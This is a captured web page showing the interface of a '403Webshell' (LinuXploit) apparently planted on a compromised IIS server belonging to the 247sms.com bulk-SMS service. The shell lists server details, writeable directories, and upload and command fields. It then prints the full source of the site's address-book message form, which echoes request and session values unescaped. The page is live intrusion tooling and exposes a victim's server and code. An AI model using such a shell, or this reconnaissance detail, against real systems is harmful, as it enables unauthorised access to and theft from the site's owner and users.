403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/HostingSpaces/admin/247sms.com/wwwroot/test/adsense/dashboard/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/HostingSpaces/admin/247sms.com/wwwroot/test/adsense/dashboard/fillformaddressbook.php
<?php
include "general2.php";
include "connect.php";

?>

<!DOCTYPE html>

<head>
  <meta charset="utf-8">
  <!--[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><![endif]-->
  <title>.::.247sms.com, The Bulksms People</title>
  <meta name="keywords" content="sms, ems, bulk sms, massive sms,sms messenging,sms,bulk,cheap sms, low price sms,sms gateway,sms provider,sms nigeria,cheap sms, low pri sms, global sms, wide coverage sms, all countries sms, smpp, sms gateway" />
  <meta name="description" content="sms messenging,sms,bulk,cheap sms, bulksms,low price sms,sms gateway,sms provider,sms nigeria, tone, tones, massive sms, smpp, smpp provider, bulksms, bulksms provider" />

  <script language="JavaScript" src="count.js"></script>

  <meta name="viewport" content="width=device-width">
  <link rel="stylesheet" href="css/templatemo_main.css">
</head>

<body>
  <div class="navbar navbar-inverse" role="navigation">
    <div class="navbar-header">
      <div class="logo">
        <h1>247sms.com<span>Welcome <?php $username = $_SESSION['username'];
                                    //$username=getUsername("nosaosahon",'247sms.com');
                                    echo $username . "&nbsp;&nbsp;";


                                    ?>Credit: <?php

            $bal = getBalance($username, $domain);
            echo $bal . "&nbsp;&nbsp;";


            ?></span></h1>
      </div>
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
  </div>
  <div class="template-page-wrapper">
    <div class="navbar-collapse collapse templatemo-sidebar">
      <ul class="templatemo-sidebar-menu">
        <li>
          <form class="navbar-form">
            <input type="text" class="form-control" id="templatemo_search_box" placeholder="Search...">
            <span class="btn btn-default">Go</span>
          </form>
        </li>
        <li class="active"><a href="dashboard.php"><i class="fa fa-home"></i>Dashboard</a></li>
        
        <li class="sub">
          <a href="javascript:;">
            <i class="fa fa-database"></i>To Send Message <div class="pull-right"><span class="caret"></span></div>
          </a>
          <ul class="templatemo-submenu">
            <li><a href="sendsms.php">Send Message</a></li>
            <li><a href="sendaddress.php">Send Message Address</a></li>
            <li><a href="sendaddressperson.php">Send Personalized Message</a></li>
            <li><a href="addressbookupload.php">Create Addressbook</a></li>
            <li><a href="addressbookuploadperson.php">Create Personalized Addressbook</a></li>
            <li><a href="manaddressbook.php">Manage Addressbook</a></li>
            <li><a href="manschedule.php">Manage Schedule</a></li>
          </ul>
        </li>
        <li><a href="onlinepayment.php"><i class="fa fa-bank"></i>Online Payment</a></li>
        <li><a href="messageawait.php"><i class="fa fa-cubes"></i>Messagelogs</a></li>
        <li><a href="accounthis.php"><i class="fa fa-archive"></i>Account History</a></li>
        <li><a href="paymenthis.php"><i class="fa fa-users"></i>Payment History</a></li>
        <li><a href="preferences.php"><i class="fa fa-cog"></i>Preferences</a></li>
        <li><a href="javascript:;" data-toggle="modal" data-target="#confirmModal"><i class="fa fa-sign-out"></i>Sign Out</a></li>
      </ul>

    </div><!--/.navbar-collapse -->

    <div class="templatemo-content-wrapper">
      <div class="templatemo-content">
        <ol class="breadcrumb">
          <li><a href="index.php">Home</a></li>
          <li><a href="dashboard.php">Dashboard</a></li>
          <li><a href="onlinepayment.php">Online Payment</a></li>
          <li><a href="pricing.php">Pricing & Coverage</a></li>
          <li><a href="tt.php">Trouble Ticket (TT)</a></li>
          <li><a href="javascript:;" data-toggle="modal" data-target="#confirmModal"></i>Sign Out</a></li>
        </ol>


        <?php
        $errno = isset($_GET['err']) ? $_GET['err'] : '';
        $cnt2 = isset($_POST['cnt2']) ? $_POST['cnt2'] : '';
        if ($cnt2 == "") {

          $_SESSION["sender"] = "";
          $_SESSION["mess"] = "";
        }

        if ($errno === '0') {

          $cnt = isset($_GET['cnt']) ? $_GET['cnt'] : '';

          echo "<div class='alert alert-success alert-dismissible' role='alert'><button type='button' class='close' data-dismiss='alert'><span aria-hidden='true'>&times;</span><span class='sr-only'>Close</span></button>
                      <strong>Success!</strong> " . $cnt . " Addressbook(s) sent.</div>";
        } else {

          if ($errno === '1') {

            echo "<div class='alert alert-danger alert-dismissible' role='alert'>
                      <button type='button' class='close' data-dismiss='alert'><span aria-hidden='true'>&times;</span><span class='sr-only'>Close</span></button>Sorry, Complete the form below before sending message...</div>";
          }


          if ($errno === '2') {

            echo "<div class='alert alert-danger alert-dismissible' role='alert'>
                      <button type='button' class='close' data-dismiss='alert'><span aria-hidden='true'>&times;</span><span class='sr-only'>Close</span></button>Sorry, Sender field cannot be blank...</div>";
          }

          if ($errno === '3') {

            echo "<div class='alert alert-danger alert-dismissible' role='alert'>
                      <button type='button' class='close' data-dismiss='alert'><span aria-hidden='true'>&times;</span><span class='sr-only'>Close</span></button>Sorry, Receiver field cannot be blank...</div>";
          }

          if ($errno === '4') {

            echo "<div class='alert alert-danger alert-dismissible' role='alert'>
                      <button type='button' class='close' data-dismiss='alert'><span aria-hidden='true'>&times;</span><span class='sr-only'>Close</span></button>Sorry, Message field cannot be blank...</div>";
          }

          if ($errno === '5') {

            echo "<div class='alert alert-danger alert-dismissible' role='alert'>
                      <button type='button' class='close' data-dismiss='alert'><span aria-hidden='true'>&times;</span><span class='sr-only'>Close</span></button>Sorry, Message field length cannot be more than 1500 characters...</div>";
          }
        }


        ?>

        <h1>Compose Message using Addressbook</h1>

        <p>
          <font color="red">Please dont use any of the keyword words below in your message</font>
        </p>
        <div class="row">
          <ul>
            <li>Code</li>
            <li>Cash</li>
            <li>Giveaway</li>
            <li>Promo</li>
            <li>Win</li>
            <li>Free</li>
            <li>Pay</li>
            <li>Congratulations!!!</li>
            <li>All mentions of any International brands e.g Google, Facebook, Instagram, Yahoo, Gmail.</li>
            <li>Messages relating to politics are not allowed</li>

          </ul>

        </div><br>
        <div class="row">
          <div class="col-md-12">
            <form role="form" id="templatemo-preferences-form" method="post" action="sendsmsconfirmaddress.php" name="mess">

              <div class="row">
                <div class="col-md-12 margin-bottom-15">
                  <label for="notes">Addressbook Attached</label>
                  <span>
                    <?php

                    if (isset($_POST['mybox'])) {

                      $mybox = $_POST['mybox'];
                      $_SESSION['mybox'] =  $mybox;
                      $it = new CachingIterator(new ArrayIterator($mybox));
                      foreach ($it as $key => $phones) {
                        $phones = trim($phones);
                        if (!$it->hasNext())
                          $myphone .= $phones;
                        else
                          $myphone .= $phones . ",";
                      }
                      $_SESSION['addressbook'] =  $myphone;
                      echo "<p class='bluewords'>" . $myphone . "</p>";
                    }


                    if (isset($_POST['cnt2'])) {

                      $mybox = $_SESSION['mybox'];
                      $_SESSION['mybox'] =  $mybox;
                      $it = new CachingIterator(new ArrayIterator($mybox));
                      foreach ($it as $key => $phones) {
                        $phones = trim($phones);
                        if (!$it->hasNext())
                          $myphone .= $phones;
                        else
                          $myphone .= $phones . ",";
                      }
                      $_SESSION['addressbook'] =  $myphone;
                      echo "<p class='bluewords'>" . $myphone . "</p>";
                    }



                    ?>
                  </span>
                </div>
              </div>


              <div class="row">
                <div class="col-md-6 margin-bottom-15">
                  <label for="firstName" class="control-label">Sender</label><span> (Alphanumeric of 11 characters eg. John2015)</span>
                  <input type="text" class="form-control" id="sender" name="sender" maxlength="16" value="<?php echo $_SESSION["sender"]; ?>" required />
                </div>
              </div>

              <div class="row">
                <div class="col-md-12 margin-bottom-15">
                  <label for="notes">Message </label><span>(1500 characters)</span>
                  <textarea class="form-control" rows="6" id="notes" required maxlength="1500" name='message' onChange="countchars(this)" onFocus="countchars(this)" onKeyDown="countchars(this)" onKeyUp="countchars(this)"><?php echo $_SESSION["mess"]; ?></textarea>
                </div>
              </div>
              <div class="row">
                <div class="col-md-6 margin-bottom-15">
                  <input value='0' size='5' name="mess_len" style="width:50px;" readonly />
                  <label for="mess_len2"> No. of SMS </label>
                  <input value='0' size='5' name="mess_len2" id="mess_len2" style="width:30px;" readonly />
                </div>
              </div>

              <div class="row">
                <div class="col-md-6 margin-bottom-2">
                  <label for="firstName" class="control-label">Message Delivery Time </label>
                </div>

              </div>

              <div class="row">
                <div class="radio margin-bottom-left-15">
                  <label>
                    <input type="radio" name="start_camp" id="start_camp" value="imm" checked>
                    Immediately
                  </label>


                  <label>
                    <input type="radio" name="start_camp" value="at" id="start_camp">
                    Schedule
                  </label>

                  <label for="start_date">Date:
                    <input type="text" name="start_date" id="start_date" value="<?php echo date('Y/m/d'); ?>" style="width:80px; font-size: 12px" />&nbsp;yyyy/mm/dd </label>

                  <label for="start_time">Time:
                    <input type="text" name="start_time" value="<?php echo date('H:i') ?>" style="width:45px; font-size: 12px;" />&nbsp;hh:mm</label>

                </div>
              </div>
              <div class="row templatemo-form-buttons">
                <div class="col-md-12">
                  <button type="submit" class="btn btn-primary">Send</button>
                  <button type="reset" class="btn btn-default">Reset</button>
                </div>
              </div>
            </form>
          </div>
        </div>
      </div>
    </div>
    <!-- Modal -->
    <div class="modal fade" id="confirmModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
      <div class="modal-dialog">
        <div class="modal-content">
          <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal"><span aria-hidden="true">&times;</span><span class="sr-only">Close</span></button>
            <h4 class="modal-title" id="myModalLabel">Are you sure you want to sign out?</h4>
          </div>
          <div class="modal-footer">
            <a href="processlogout.php?res=yes" class="btn btn-primary">Yes</a>
            <button type="button" class="btn btn-default" data-dismiss="modal">No</button>
          </div>
        </div>
      </div>
    </div>
    <footer class="templatemo-footer">
      <div class="templatemo-copyright">
        <p>Copyright &copy; 2003 Swift Alliance Ltd</p>
      </div>
    </footer>
  </div>

  <script src="js/jquery.min.js"></script>
  <script src="js/bootstrap.min.js"></script>
  <script src="js/Chart.min.js"></script>
  <script src="js/templatemo_script.js"></script>
  <script type="text/javascript">
    // Line chart
    var randomScalingFactor = function() {
      return Math.round(Math.random() * 100)
    };
    var lineChartData = {
      labels: ["January", "February", "March", "April", "May", "June", "July"],
      datasets: [{
          label: "My First dataset",
          fillColor: "rgba(220,220,220,0.2)",
          strokeColor: "rgba(220,220,220,1)",
          pointColor: "rgba(220,220,220,1)",
          pointStrokeColor: "#fff",
          pointHighlightFill: "#fff",
          pointHighlightStroke: "rgba(220,220,220,1)",
          data: [randomScalingFactor(), randomScalingFactor(), randomScalingFactor(), randomScalingFactor(), randomScalingFactor(), randomScalingFactor(), randomScalingFactor()]
        },
        {
          label: "My Second dataset",
          fillColor: "rgba(151,187,205,0.2)",
          strokeColor: "rgba(151,187,205,1)",
          pointColor: "rgba(151,187,205,1)",
          pointStrokeColor: "#fff",
          pointHighlightFill: "#fff",
          pointHighlightStroke: "rgba(151,187,205,1)",
          data: [randomScalingFactor(), randomScalingFactor(), randomScalingFactor(), randomScalingFactor(), randomScalingFactor(), randomScalingFactor(), randomScalingFactor()]
        }
      ]

    }

    window.onload = function() {
      var ctx_line = document.getElementById("templatemo-line-chart").getContext("2d");
      window.myLine = new Chart(ctx_line).Line(lineChartData, {
        responsive: true
      });
    };

    $('#myTab a').click(function(e) {
      e.preventDefault();
      $(this).tab('show');
    });

    $('#loading-example-btn').click(function() {
      var btn = $(this);
      btn.button('loading');
      // $.ajax(...).always(function () {
      //   btn.button('reset');
      // });
    });
  </script>
</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit